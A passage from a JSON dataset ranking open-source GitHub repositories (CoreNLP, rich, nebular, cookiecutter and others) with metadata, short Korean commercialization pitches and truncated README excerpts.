Contributors](https://img.shields.io/badge/all_contributors-153-orange.svg?style=flat-square)](#contributors-)\n[![CircleCI](https://circleci.com/gh/codesandbox/codesandbox-client.svg?style=svg)](https://circleci.com/gh/codesandbox/codesandbox-client)\n[![BrowserStack Status](https://www.browserstack.com/automate/badge.svg?badge_key=cVJuczlJWUtqWXhIbFN1ZjVQekF4NzNsd3phNEZRaGlWU0pHYVVkdGRFWT0tLXFtTVhaOWRySmN0ZG5QVDNDQ0g5Z0E9PQ==--79fe3eae4f149a400d396c9b12d3988f685785cf)](https://www.browserstack.com/automate/public-build/cVJuczlJWUtqWXhIbFN1ZjVQekF4NzNsd3phNEZRaGlWU0pHYVVkdGRFWT0tLXFtTVhaOWRySmN0ZG5QVDNDQ0g5Z0E9PQ==--79fe3eae4f149a400d396c9b12d3988f685785cf)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)\n[![first-timers-only Friendly](https://img.shields","composite_score":0.1115,"license_safety_tag":"unknown"},{"name":"jashook/vscode-dotnet-insights","github_url":"https://github.com/jashook/vscode-dotnet-insights","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":6,"description":"# vscode-dotnet-insights 기술 자산 분석\n\n## 왜 보물인가\n프로그래머가 C# 코드를 작성할 때 실시간으로 문제점을 찾아주는 스마트 보조 도구로, 코드 품질을 자동으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 소프트웨어 회사를 위한 \"자동 코드 검사 클라우드 서비스\"로 월 구독료 수익 창출\n2.","readme_excerpt":"# Dotnet Insights\n\n**This extension uses Unsigned tools. This extension is not meant to be used in a production environment**\n\nAn extension for drilling into .NET MSIL and Jitted ASM for managed executables (PE Files). This is a cross platform extension that works on Linux (Ubuntu) OSX and Windows x64. The extension has a few different quality of life improvements. It is intended as an extension to improve .NET development in general. Please see the full feature list below.\n\nFuture work to include Linux arm64. Currently 32-bit support is not expected to be worked on; however, feel free to contribute.\n\n## dotnetInsights\n\nSee [dotnetInsights](dotnetInsights/README.md) for more information.","composite_score":0.1112,"license_safety_tag":"unknown"},{"name":"stanfordnlp/CoreNLP","github_url":"https://github.com/stanfordnlp/CoreNLP","stars":6,"language":"Java","license":"gpl-3.0","abandonment_months":0,"description":"# CoreNLP 보물지도\n\n## 왜 보물인가\n한국어를 포함한 다국어 텍스트를 자동으로 분석하고 의미를 파악해주는 전문 도구로, 문서 분류, 감정 분석, 정보 추출 같은 다양한 비즈니스 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 고객 피드백 분석 SaaS**\n- 쇼핑몰, SNS, 리뷰 플랫폼의 고객 댓글을 자동으로 분석해 만족도를 평","readme_excerpt":"# Stanford CoreNLP\n\n[![Run Tests](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml/badge.svg)](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml)\n[![Maven Central](https://img.shields.io/maven-central/v/edu.stanford.nlp/stanford-corenlp.svg)](https://mvnrepository.com/artifact/edu.stanford.nlp/stanford-corenlp)\n[![Twitter](https://img.shields.io/twitter/follow/stanfordnlp.svg?style=social&label=Follow)](https://twitter.com/stanfordnlp/)\n\n[Stanford CoreNLP](http://stanfordnlp.github.io/CoreNLP/) provides a set of natural language analysis tools written in Java. It can take raw human language text input and give the base forms of words, their parts of speech, whether they are names of companies, people, etc., normalize and interpret dates, times, and numeric quantities, mark up the structure of sentences in terms of syntactic phrases or dependencies, and indicate which noun phrases refer to the same entities. It was originally developed for En","composite_score":0.1109,"license_safety_tag":"restricted"},{"name":"saketkc/pysradb","github_url":"https://github.com/saketkc/pysradb","stars":5,"language":"Python","license":"BSD-3-Clause","abandonment_months":6,"description":"# pysradb 상용화 분석\n\n## 왜 보물인가\n생명과학 연구에 필수적인 방대한 유전자 데이터를 자동으로 찾고 정리해주는 도구로, 연구자들의 귀중한 시간을 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 생명공학 연구자를 위한 웹 기반 데이터 검색 및 분석 플랫폼 (월 구독형)\n2. **내부 업무 도구**: 제약사/바이오기","readme_excerpt":"# A Python package for retrieving metadata from SRA/ENA/GEO\n\n[![image](https://img.shields.io/pypi/v/pysradb.svg?style=flat-square)](https://pypi.python.org/pypi/pysradb)\n[![image](https://anaconda.org/bioconda/pysradb/badges/version.svg)](https://anaconda.org/bioconda/pysradb/badges/version.svg)\n[![image](https://img.shields.io/badge/install%20with-bioconda-brightgreen.svg?style=flat-square)](http://bioconda.github.io/recipes/pysradb/README.html)\n[![image](https://static.pepy.tech/personalized-badge/pysradb?period=month&units=international_system&left_color=black&right_color=brightgreen&left_text=Downloads/month)](https://pepy.tech/project/pysradb)\n[![image](https://zenodo.org/badge/159590788.svg)](https://zenodo.org/badge/latestdoi/159590788)\n[![image](https://github.com/saketkc/pysradb/workflows/push/badge.svg)](https://github.com/saketkc/pysradb/actions)\n\n## Documentation\n\n<https://saketkc.github.io/pysradb>\n\n## CLI Usage\n\n`pysradb` supports command line usage. See\n[CLI](https://sa","composite_score":0.1109,"license_safety_tag":"safe"},{"name":"akveo/nebular","github_url":"https://github.com/akveo/nebular","stars":6,"language":"TypeScript","license":"mit","abandonment_months":4,"description":"# Nebular 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱의 사용자 인터페이스(화면 구성)를 빠르고 예쁘게 만들 수 있는 디자인 시스템으로, 개발자들이 반복적인 작업을 줄이고 일관성 있는 디자인을 유지하게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회사의 재무 관리, 인사 관리, 프로젝트 관리 소프트웨어 등 기업용 웹 애플리케이","readme_excerpt":"# Nebular [<img src=\"https://i.imgur.com/oMcxwZ0.png\" alt=\"Eva Design System\" height=\"20px\" />](https://eva.design?utm_campaign=eva_design%20-%20home%20-%20nebular%20github%20readme&utm_source=nebular&utm_medium=referral&utm_content=github_readme_hero_pic) [![npm](https://img.shields.io/npm/l/@nebular/theme.svg)]() [![npm](https://img.shields.io/npm/dt/@nebular/theme.svg)](https://www.npmjs.com/package/@nebular/theme) [![Codecov](https://img.shields.io/codecov/c/github/akveo/nebular/master.svg?style=flat-square)](https://codecov.io/gh/akveo/nebular/branch/master)\n\n[Documentation](https://akveo.github.io/nebular/docs/getting-started/what-is-nebular?utm_campaign=nebular%20-%20home%20-%20nebular%20github%20readme&utm_source=nebular&utm_medium=referral&utm_content=documentation) | [Stackblitz Template](https://stackblitz.com/github/akveo/nebular-seed) | [Angular templates](https://www.akveo.com/templates?utm_campaign=services%20-%20github%20-%20templates&utm_source=nebular&utm_medium=refer","composite_score":0.1108,"license_safety_tag":"safe"},{"name":"SteamTools-Team/SteamTools","github_url":"https://github.com/SteamTools-Team/SteamTools","stars":6,"language":"C#","license":"GPL-3.0","abandonment_months":3,"description":"# SteamTools 상용화 분석\n\n## 왜 보물인가\nSteam 게임 플랫폼 사용자들의 반복적인 작업을 자동화해주는 도구로, 게이머와 게임 개발사 모두에게 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게이머 대상 월 구독형 자동화 도구 (게임 라이브러리 관리, 세일 알림, 자동 다운로드)\n2. **내부 업무 도구*","readme_excerpt":"<h1 align=\"center\">Watt Toolkit 🧰 (原名 Steam++)</h1>\n\n<div align=\"center\">\n\n[English](./README.en.md) | 简体中文\n\n「Watt Toolkit」是一个开源跨平台的多功能游戏工具箱，此工具的大部分功能都是需要您下载安装 Steam 才能使用。\n \n![Release Download](https://img.shields.io/github/downloads/BeyondDimension/SteamTools/total?style=flat-square)\n[![Release Version](https://img.shields.io/github/v/release/BeyondDimension/SteamTools?style=flat-square)](https://github.com/BeyondDimension/SteamTools/releases/latest)\n[![GitHub license](https://img.shields.io/github/license/BeyondDimension/SteamTools?style=flat-square)](LICENSE)\n[![GitHub Star](https://img.shields.io/github/stars/BeyondDimension/SteamTools?style=flat-square)](https://github.com/BeyondDimension/SteamTools/stargazers)\n[![GitHub Fork](https://img.shields.io/github/forks/BeyondDimension/SteamTools?style=flat-square)](https://github.com/BeyondDimension/SteamTools/network/members)\n![GitHub Repo size](https://img.shields.io/github/repo-size/BeyondDimension/SteamTools?style=flat-square&color=3","composite_score":0.1108,"license_safety_tag":"restricted"},{"name":"HaveIBeenPwned/PwnedPasswordsAzureFunction","github_url":"https://github.com/HaveIBeenPwned/PwnedPasswordsAzureFunction","stars":46,"language":"C#","license":"BSD-3-Clause","abandonment_months":6,"description":"# HaveIBeenPwned/PwnedPasswordsAzureFunction 분석\n\n## 왜 보물인가\n사용자가 해킹당한 비밀번호를 사용하고 있진 않은지 자동으로 확인해주는 보안 도구로, 모든 온라인 서비스 가입 시스템에 필수적인 기능입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회원가입 페이지에 통합하여 약한 비밀번호 차단 시스템 제공","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/HaveIBeenPwned/PwnedPasswordsAzureFunction\">\n    <img src=\".github/images/logo.png\" alt=\"HIBP Logo\" width=\"434\" height=\"81\">\n  </a>\n\n  <h1 align=\"center\">Pwned Passwords - Azure Function</h1>\n\t\n  <p align=\"center\">\n  <a href=\"LICENSE\" alt=\"License\">\n    <img src=\"https://img.shields.io/github/license/HaveIBeenPwned/PwnedPasswordsAzureFunction?style=flat-square\" /></a>\n  <a href=\"https://github.com/HaveIBeenPwned/PwnedPasswordsAzureFunction/graphs/contributors\" alt=\"Contributors\">\n    <img src=\"https://img.shields.io/github/contributors/HaveIBeenPwned/PwnedPasswordsAzureFunction?style=flat-square\" /></a>\n  <a href=\"https://github.com/HaveIBeenPwned/PwnedPasswordsAzureFunction/pulls?q=is%3Apr+is%3Aclosed\" alt=\"Closed PRs\">\n    <img src=\"https://img.shields.io/github/issues-pr-closed/HaveIBeenPwned/PwnedPasswordsAzureFunction?style=flat-square\" /></a>\n  <a href=\"https://github.com/HaveIBeenPwned/PwnedPasswordsAzureFunction/network/members/\"","composite_score":0.1105,"license_safety_tag":"safe"},{"name":"willmcgugan/rich","github_url":"https://github.com/willmcgugan/rich","stars":21,"language":"Python","license":"mit","abandonment_months":1,"description":"# Rich 저장소 분석\n\n## 왜 보물인가\n터미널(검은 화면)에서 글자와 표를 화려하게 꾸며 보여주는 도구로, 데이터를 시각적으로 예쁘게 표현해야 하는 모든 프로그램의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 관리 플랫폼 SaaS**\n- 서버 상태 모니터링 대시보드에서 CPU, 메모리 사용량을 컬러풀한 표로 표시\n\n**2. ","readme_excerpt":"[![Supported Python Versions](https://img.shields.io/pypi/pyversions/rich)](https://pypi.org/project/rich/) [![PyPI version](https://badge.fury.io/py/rich.svg)](https://badge.fury.io/py/rich)\n\n[![Downloads](https://pepy.tech/badge/rich/month)](https://pepy.tech/project/rich)\n[![codecov](https://img.shields.io/codecov/c/github/Textualize/rich?label=codecov&logo=codecov)](https://codecov.io/gh/Textualize/rich)\n[![Rich blog](https://img.shields.io/badge/blog-rich%20news-yellowgreen)](https://www.willmcgugan.com/tag/rich/)\n[![Twitter Follow](https://img.shields.io/twitter/follow/willmcgugan.svg?style=social)](https://twitter.com/willmcgugan)\n\n![Logo](https://github.com/textualize/rich/raw/master/imgs/logo.svg)\n\n[English readme](https://github.com/textualize/rich/blob/master/README.md)\n • [简体中文 readme](https://github.com/textualize/rich/blob/master/README.cn.md)\n • [正體中文 readme](https://github.com/textualize/rich/blob/master/README.zh-tw.md)\n • [Lengua española readme](https://github.com/te","composite_score":0.11,"license_safety_tag":"safe"},{"name":"wasp-lang/haskell-handbook","github_url":"https://github.com/wasp-lang/haskell-handbook","stars":7,"language":"","license":"unknown","abandonment_months":6,"description":"# Haskell Handbook 평가 리포트\n\n## 왜 보물인가\n프로그래밍 초보자도 따라 배울 수 있는 **Haskell 프로그래밍 언어 학습 가이드**로, 복잡한 소프트웨어 개발을 더 쉽고 안전하게 만드는 기초 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼(SaaS)**: Udemy, Coursera 같은 강의 사이트에서 유","readme_excerpt":"# haskell-handbook\nBest practices on how to be efficient with Haskell in production.\n\nIn a sense, this is a set of blog posts that give best practices on common things in Haskell that are not straight forward.\nThey serve as help for Wasp developers/contributors but also as general source of knowledge.\nOne day, if this handbook becomes good enough, we can look into elevating it into documentation effort on the level of whole Haskell community, beyond Wasp.\n\nAll of the posts in this repo should be focusing on the following:\n- Must be easy to understand, even for a beginner.\n- If possible, should be opinionated about the best approache when there are multiple of them (it should still mention them all though).\n- Must be rich with practical examples.\n- Should be focusing on practical usage in real projects where juniors might be joining and we want them to be efficient soon after they join.\n","composite_score":0.11,"license_safety_tag":"unknown"},{"name":"krzyzanowskim/CryptoSwift","github_url":"https://github.com/krzyzanowskim/CryptoSwift","stars":5,"language":"Swift","license":"NOASSERTION","abandonment_months":1,"description":"# CryptoSwift 보물 분석\n\n## 왜 보물인가\n암호화 기술이 필요한 모든 앱과 서비스에서 쉽게 사용할 수 있는 검증된 도구로, 보안이 필요한 디지털 서비스 개발에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **금융앱 SaaS**: 은행 송금·결제 앱에서 고객 계좌정보 암호화 보호 기능 제공\n2. **메신저 플랫폼**: 카카오톡·라인 같은 메시징","readme_excerpt":"[![Platform](https://img.shields.io/badge/Platforms-Apple%20platforms%20%7C%20Linux%20%7C%20Android-4E4E4E.svg?colorA=28a745)](#requirements)\n\n[![Swift support](https://img.shields.io/badge/Swift-5.6%2B-lightgrey.svg?colorA=28a745&colorB=4E4E4E)](#requirements)\n[![Swift Package Manager compatible](https://img.shields.io/badge/SPM-compatible-brightgreen.svg?style=flat&colorA=28a745&&colorB=4E4E4E)](https://github.com/swiftlang/swift-package-manager)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-brightgreen.svg?style=flat&colorA=28a745&&colorB=4E4E4E)](https://github.com/Carthage/Carthage)\n[![CocoaPods Deprecated](https://img.shields.io/cocoapods/v/CryptoSwift.svg?style=flat&label=CocoaPods&colorA=red&&colorB=4E4E4E)](https://cocoapods.org/pods/CryptoSwift)\n\n# CryptoSwift\n\nPure Swift cryptographic primitives and utilities for [Swift](https://swift.org). ([#PureSwift](https://twitter.com/hashtag/pureswift))\n\n**Note**: The current release line builds with Swift 5","composite_score":0.1099,"license_safety_tag":"unknown"},{"name":"jellysquid3/Lithium","github_url":"https://github.com/jellysquid3/Lithium","stars":7,"language":"Java","license":"LGPL-3.0","abandonment_months":0,"description":"# Lithium 저장소 분석\n\n## 왜 보물인가\n마인크래프트 게임의 성능을 획기적으로 개선하는 기술로, 게임을 더 빠르고 부드럽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 호스팅 SaaS**: 마인크래프트 서버를 운영하는 회사들이 이 기술을 적용하여 더 많은 플레이어를 수용하고 서비스 품질을 높일 수 있습니다.\n2. **게임 최적화 도","readme_excerpt":"<img src=\"common/src/main/resources/assets/lithium/lithium-icon.png\" width=\"128\">\n\n# Lithium\n\nLithium is a free and open-source Minecraft mod which works to optimize many areas of the game in order to provide\nbetter overall performance. It works on both the **client and server**, and **doesn't require the mod to be installed\non both sides**.\n\n## 📥 Downloads & Installation\n\nDownload Lithium from [Modrinth](https://modrinth.com/mod/lithium) or\n[CurseForge](https://www.curseforge.com/minecraft/mc-mods/lithium).\n\nLithium supports two mod loaders: Fabric and the NeoForge. You can use a launcher\n(e.g. the [Modrinth launcher](https://modrinth.com/app)) to install lithium. Alternatively, you can install lithium\nmanually by placing lithium's jar-file in the `mods` folder of your game after you have installed the\ncorresponding mod loader.\n\n### 📝 Why Choose Lithium?\n\nLithium is the perfect drop-in mod for players who want more performance without affecting their gameplay.\nIt doesn't change any ga","composite_score":0.1099,"license_safety_tag":"restricted"},{"name":"reaqtive/reaqtor","github_url":"https://github.com/reaqtive/reaqtor","stars":8,"language":"C#","license":"MIT","abandonment_months":6,"description":"# Reaqtor 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 처리 작업을 자동으로 관리해주는 기술로, 많은 정보를 실시간으로 다루는 기업들이 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 데이터 분석 SaaS**: 주식시장, 센서 데이터 등을 즉각적으로 처리하고 고객에게 인사이트 제공하는 웹 서비스\n2. **금융사 내부 시","readme_excerpt":"![https://reaqtive.net](reaqtor-header.svg)\n\n[![.NET Foundation](https://img.shields.io/badge/.NET%20Foundation-blueviolet.svg)](https://www.dotnetfoundation.org/)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n[![Build Status](https://dev.azure.com/dotnet/Reaqtor-private/_apis/build/status/reaqtive.reaqtor?branchName=main)](https://dev.azure.com/dotnet/Reaqtor-private/_build/latest?definitionId=155&branchName=main)\n[![codecov](https://codecov.io/gh/reaqtive/reaqtor/branch/main/graph/badge.svg?token=AD59K911YN)](https://codecov.io/gh/reaqtive/reaqtor) [![NuGet](https://img.shields.io/badge/nuget-reaqtive-blue)](https://www.nuget.org/profiles/reaqtive)\n\n# About Reaqtor\n\n[Reaqtor](https://reaqtive.net) is a framework for reliable, stateful, distributed, and scalable event processing based on [Reactive Extensions (Rx)](https://github.com/dotnet/reactive).\n\nReaqtor has been in development for over 10 years. It is the evolution of","composite_score":0.1098,"license_safety_tag":"safe"},{"name":"SystemErrorWang/White-box-Cartoonization","github_url":"https://github.com/SystemErrorWang/White-box-Cartoonization","stars":5,"language":"Python","license":"unknown","abandonment_months":4,"description":"# White-box-Cartoonization 상용화 분석\n\n## 왜 보물인가\n사진이나 동영상을 자동으로 만화 같은 그림으로 변환해주는 기술로, 애니메이션·게임·광고 제작에 필요한 작업 시간을 대폭 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 웹 서비스**\n사용자가 웹사이트에 사진을 업로드하면 자동으로 만화체 이미지로 변환해주는 온","readme_excerpt":"<img src='paper/shinjuku.jpg' align=\"left\" width=1000>\n\n<br><br><br>\n\n# [CVPR2020]Learning to Cartoonize Using White-box Cartoon Representations\n[project page](https://systemerrorwang.github.io/White-box-Cartoonization/) |   [paper](https://github.com/SystemErrorWang/White-box-Cartoonization/blob/master/paper/06791.pdf) |   [twitter](https://twitter.com/IlIIlIIIllIllII/status/1243108510423896065) |   [zhihu](https://zhuanlan.zhihu.com/p/117422157) |   [bilibili](https://www.bilibili.com/video/av56708333) |  [facial model](https://github.com/SystemErrorWang/FacialCartoonization)\n\n- Tensorflow implementation for CVPR2020 paper “Learning to Cartoonize Using White-box Cartoon Representations”.\n- Improved method for facial images are now available:\n- https://github.com/SystemErrorWang/FacialCartoonization\n\n<img src=\"images/method.jpg\" width=\"1000px\"/>\n<img src=\"images/use_cases.jpg\" width=\"1000px\"/>\n\n## Use cases\n\n### Scenery\n<img src=\"images/city1.jpg\" width=\"1000px\"/>\n<img src=\"images/cit","composite_score":0.1097,"license_safety_tag":"unknown"},{"name":"pandas-profiling/pandas-profiling","github_url":"https://github.com/pandas-profiling/pandas-profiling","stars":7,"language":"Python","license":"MIT","abandonment_months":1,"description":"# pandas-profiling 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 자동으로 분석하고 시각화해주는 도구로, 데이터 품질 점검에 드는 시간을 80% 이상 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 품질 검증 SaaS**: 기업들이 업로드한 엑셀/CSV 파일을 자동 분석해 오류와 이상치를 찾아주는 웹서비스\n2. **내부 업무","readme_excerpt":"# fg-data-profiling\n\n> **`ydata-profiling` is now `fg-data-profiling`.** This package has been renamed to `fg-data-profiling`. Please follow the [Migration Guide](#migration-guide) as soon as possible — the old package will no longer receive updates or bug fixes.\n\n[![Build Status](https://github.com/ydataai/pandas-profiling/actions/workflows/tests.yml/badge.svg?branch=master)](https://github.com/ydataai/pandas-profiling/actions/workflows/tests.yml)\n[![PyPI download month](https://img.shields.io/pypi/dm/fg-data-profiling.svg)](https://pypi.python.org/pypi/fg-data-profiling/)\n[![](https://pepy.tech/badge/pandas-profiling)](https://pypi.org/project/fg-data-profiling/)\n[![Code Coverage](https://codecov.io/gh/ydataai/pandas-profiling/branch/master/graph/badge.svg?token=gMptB4YUnF)](https://codecov.io/gh/ydataai/pandas-profiling)\n[![Release Version](https://img.shields.io/github/release/ydataai/pandas-profiling.svg)](https://github.com/ydataai/pandas-profiling/releases)\n[![Python Version](ht","composite_score":0.1096,"license_safety_tag":"safe"},{"name":"uber-go/fx","github_url":"https://github.com/uber-go/fx","stars":6,"language":"Go","license":"mit","abandonment_months":5,"description":"# Uber Go/FX 저장소 분석\n\n## 왜 보물인가\n복잡한 소프트웨어를 빠르고 쉽게 조립하는 방식을 제공하여, 개발 속도를 대폭 단축할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 업무 관리 플랫폼에서 여러 기능을 빠르게 연결하여 출시 시간을 단축\n2. **내부 업무 도구**: 대기업의 HR·재무 부서가","readme_excerpt":"# :unicorn: Fx [![GoDoc](https://pkg.go.dev/badge/go.uber.org/fx)](https://pkg.go.dev/go.uber.org/fx) [![Github release](https://img.shields.io/github/release/uber-go/fx.svg)](https://github.com/uber-go/fx/releases) [![Build Status](https://github.com/uber-go/fx/actions/workflows/go.yml/badge.svg)](https://github.com/uber-go/fx/actions/workflows/go.yml) [![Coverage Status](https://codecov.io/gh/uber-go/fx/branch/master/graph/badge.svg)](https://codecov.io/gh/uber-go/fx/branch/master) [![Go Report Card](https://goreportcard.com/badge/go.uber.org/fx)](https://goreportcard.com/report/go.uber.org/fx)\n\nFx is a dependency injection system for Go.\n\n**Benefits**\n\n- Eliminate globals: Fx helps you remove global state from your application.\n  No more `init()` or global variables. Use Fx-managed singletons.\n- Code reuse: Fx lets teams within your organization build loosely-coupled\n  and well-integrated shareable components.\n- Battle tested: Fx is the backbone of nearly all Go services at Uber.\n\nS","composite_score":0.1096,"license_safety_tag":"safe"},{"name":"openwisp/openwisp-radius","github_url":"https://github.com/openwisp/openwisp-radius","stars":10,"language":"Python","license":"GPL-3.0","abandonment_months":0,"description":"# OpenWISP Radius 기술 사업화 분석\n\n## 왜 보물인가\n인터넷 사용자 인증을 관리하는 핵심 인프라로, 대규모 네트워크를 운영하는 모든 기업이 필요한 기본 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **와이파이/인터넷 서비스 SaaS**: 카페, 호텔, 대학교 등이 고객 접속을 관리하는 클라우드 서비스로 제공\n2. **기업 내부 네트워크 관","readme_excerpt":"openwisp-radius\n===============\n\n.. image:: https://github.com/openwisp/openwisp-radius/actions/workflows/ci.yml/badge.svg\n    :target: https://github.com/openwisp/openwisp-radius/actions/workflows/ci.yml\n    :alt: CI build status\n\n.. image:: https://coveralls.io/repos/github/openwisp/openwisp-radius/badge.svg?branch=master\n    :target: https://coveralls.io/github/openwisp/openwisp-radius?branch=master\n    :alt: Test Coverage\n\n.. image:: https://img.shields.io/librariesio/release/github/openwisp/openwisp-radius\n    :target: https://libraries.io/github/openwisp/openwisp-radius#repository_dependencies\n    :alt: Dependency monitoring\n\n.. image:: https://img.shields.io/gitter/room/nwjs/nw.js.svg\n    :target: https://gitter.im/openwisp/general\n    :alt: Chat\n\n.. image:: https://badge.fury.io/py/openwisp-radius.svg\n    :target: http://badge.fury.io/py/openwisp-radius\n    :alt: Pypi Version\n\n.. image:: https://pepy.tech/badge/openwisp-radius\n    :target: https://pepy.tech/project/openwisp-rad","composite_score":0.1093,"license_safety_tag":"restricted"},{"name":"MobleyLab/Training","github_url":"https://github.com/MobleyLab/Training","stars":5,"language":"","license":"MIT","abandonment_months":6,"description":"# MobleyLab/Training 분석\n\n## 왜 보물인가\n학습과 교육을 위한 체계적인 자료 모음으로, 누구나 특정 분야의 지식을 체계적으로 습득할 수 있도록 설계된 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 구독 기반 학습 콘텐츠 서비스로 운영하여 학생들에게 월 구독료 징수\n2. **기업 직원 교육 솔루션**: 대기","readme_excerpt":"# Training\n\nThis repository is currently under construction. It will eventually contain various Mobley Lab training materials, policies, procedures, etc.\n\n## Manifest\n- `NewMembers`: Info for new members in the Mobley Lab, which may be useful more broadly.\n- `SciBiz`: To contain various information on what my old PI would call \"the science business\", such as navigating peer review, networking, etc. Currently contains information on navigating papers through peer review.\n- `Writing`: Information and tips on writing, including a style guide and info on our paper-writing process.\n- `Computing`: Background relating to scientific computing, Python, coding, etc., both generally and in the lab in specific\n\n\n\n## License\n\nThis material here is made available under CC-BY and MIT licenses, as appropriate:\n\nMIT for all software/code\n[CC-BY 4.0](https://creativecommons.org/licenses/by/4.0/) for all other materials\n","composite_score":0.1092,"license_safety_tag":"safe"},{"name":"overtrue/wechat","github_url":"https://github.com/overtrue/wechat","stars":5,"language":"PHP","license":"mit","abandonment_months":1,"description":"# overtrue/wechat 저장소 분석\n\n## 왜 보물인가\n중국의 가장 큰 메신저 서비스인 위챗(WeChat)을 프로그래밍으로 자동 제어할 수 있는 도구로, 이를 통해 위챗 관련 비즈니스를 자동화하고 확장할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **위챗 마케팅 자동화 SaaS**: 기업들이 위챗 고객 관리, 자동 메시지 발송, 구독자 관리를 ","readme_excerpt":"# [EasyWeChat](https://easywechat.com)\n\n📦 一个 PHP 微信开发 SDK，开源 SaaS 平台提供商 [微擎](https://www.w7.cc/) 旗下开源产品。\n\n[![Test Status](https://github.com/w7corp/easywechat/workflows/Test/badge.svg)](https://github.com/w7corp/easywechat/actions)\n[![Lint Status](https://github.com/w7corp/easywechat/workflows/Lint/badge.svg)](https://github.com/w7corp/easywechat/actions)\n[![Latest Stable Version](https://poser.pugx.org/w7corp/easywechat/v/stable.svg)](https://packagist.org/packages/w7corp/easywechat)\n[![Latest Unstable Version](https://poser.pugx.org/w7corp/easywechat/v/unstable.svg)](https://packagist.org/packages/w7corp/easywechat)\n[![Total Downloads](https://poser.pugx.org/w7corp/easywechat/downloads)](https://packagist.org/packages/w7corp/easywechat)\n[![License](https://poser.pugx.org/w7corp/easywechat/license)](https://packagist.org/packages/w7corp/easywechat)\n\n## 环境需求\n\n- PHP >= 8.0.2\n- [Composer](https://getcomposer.org/) >= 2.0\n\n## 安装\n\n```bash\ncomposer require w7corp/easywechat\n```\n\n## 使用示例\n\n基本","composite_score":0.1091,"license_safety_tag":"safe"},{"name":"audreyr/cookiecutter","github_url":"https://github.com/audreyr/cookiecutter","stars":16,"language":"Python","license":"bsd-3-clause","abandonment_months":2,"description":"# Cookiecutter 저장소 분석\n\n## 왜 보물인가\n새로운 프로젝트를 빠르게 시작할 수 있도록 틀을 자동으로 만들어주는 도구로, 반복적인 설정 작업을 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사가 자신의 프로젝트 템플릿을 클라우드에서 즉시 생성할 수 있는 웹 기반 템플릿 생성 서비스\n2. **내부 업무 도구**: 대기","readme_excerpt":"<h1 align=\"center\">\n    <img alt=\"cookiecutter Logo\" width=\"200px\" src=\"https://raw.githubusercontent.com/cookiecutter/cookiecutter/main/logo/cookiecutter_medium.png\">\n</h1>\n\n<div align=\"center\">\n\n[![pypi](https://img.shields.io/pypi/v/cookiecutter.svg)](https://pypi.org/project/cookiecutter/)\n[![python](https://img.shields.io/pypi/pyversions/cookiecutter.svg)](https://pypi.org/project/cookiecutter/)\n[![PyPI Downloads](https://static.pepy.tech/personalized-badge/cookiecutter?period=total&units=INTERNATIONAL_SYSTEM&left_color=BLACK&right_color=GREEN&left_text=downloads)](https://pepy.tech/projects/cookiecutter)\n[![GitHub Stars](https://img.shields.io/github/stars/cookiecutter/cookiecutter?style=flat&logo=github&label=stars)](https://github.com/cookiecutter/cookiecutter)\n[![discord](https://img.shields.io/badge/Discord-cookiecutter-5865F2?style=flat&logo=discord&logoColor=white)](https://discord.gg/9BrxzPKuEW)\n[![docs](https://readthedocs.org/projects/cookiecutter/badge/?version=latest)]","composite_score":0.109,"license_safety_tag":"safe"},{"name":"react-community/react-native-image-picker","github_url":"https://github.com/react-community/react-native-image-picker","stars":5,"language":"Java","license":"mit","abandonment_months":2,"description":"# react-native-image-picker 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 사진을 선택하고 편집하는 기능을 쉽게 만들 수 있는 도구로, 많은 모바일 앱 개발자들이 반복적으로 필요로 하는 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: SNS 앱, 전자상거래 플랫폼의 상품 사진 업로드 기능\n- **내부 업무 도","readme_excerpt":"# react-native-image-picker 🎆\n\nA React Native module that allows you to select a photo/video from the device library or camera.\n\n[![npm downloads](https://img.shields.io/npm/dw/react-native-image-picker)](https://img.shields.io/npm/dw/react-native-image-picker)\n[![npm package](https://img.shields.io/npm/v/react-native-image-picker?color=red)](https://img.shields.io/npm/v/react-native-image-picker?color=red)\n[![License](https://img.shields.io/github/license/react-native-image-picker/react-native-image-picker?color=blue)](https://github.com/react-native-image-picker/react-native-image-picker/blob/main/LICENSE.md)\n\n## Installation\n\n```bash\nyarn add react-native-image-picker\n```\n\n### New Architecture\n\nTo take advantage of the new architecture run-\n\n#### iOS\n\n```bash\nRCT_NEW_ARCH_ENABLED=1 npx pod-install ios\n```\n\n#### Android\n\nSet `newArchEnabled` to `true` inside `android/gradle.properties`\n\n### Pre-Fabric (AKA not using the new architecture)\n\n```bash\nnpx 